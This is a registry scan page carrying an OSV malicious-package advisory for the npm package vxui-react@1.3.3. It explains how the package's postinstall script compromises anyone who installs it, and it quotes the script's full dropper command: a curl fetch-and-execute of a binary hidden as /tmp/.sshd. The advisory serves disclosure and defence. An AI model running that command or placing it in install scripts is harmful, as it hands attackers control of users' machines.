registry  /  vxui-react  /  1.3.3

vxui-react@1.3.3

OSV Malicious Advisory

scanned 8d ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-4793 confirms this npm version as malicious. On `npm install`, package.json's postinstall script runs `curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &`...

Advisory
MAL-2026-4793
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in vxui-react (npm)
Details
On `npm install`, package.json's postinstall script runs `curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &`. The fetch disables TLS verification (`-k`), silences errors, points at an unpinned `latest` release on a GitHub account (`parikhpreyash4`) unrelated to the package's declared repository (`tmplink/vxui_react`), verifies no hash, drops the binary at a hidden path masquerading as the ssh daemon (`/tmp/.sshd`), and backgrounds it so the install completes without surfacing the child process. Every installer running `npm install vxui-react` thereby executes arbitrary attacker-controlled code on their machine. The package additionally lists itself (`vxui-react: ^1.3.1`) in its own `dependencies`, an unusual shape consistent with namespace/dependency-graph manipulation; the dropper above is the primary harm. ## Source: ghsa-malware (57e4aeb03972170b150bd34ade1a06f6f29359eeb7c5efa797491c5d98cf8d9a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Decision reason
OpenSSF Malicious Packages via OSV confirms vxui-react@1.3.3 as malicious (MAL-2026-4793): Malicious code in vxui-react (npm)

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 High
HighOsv Malicious Advisory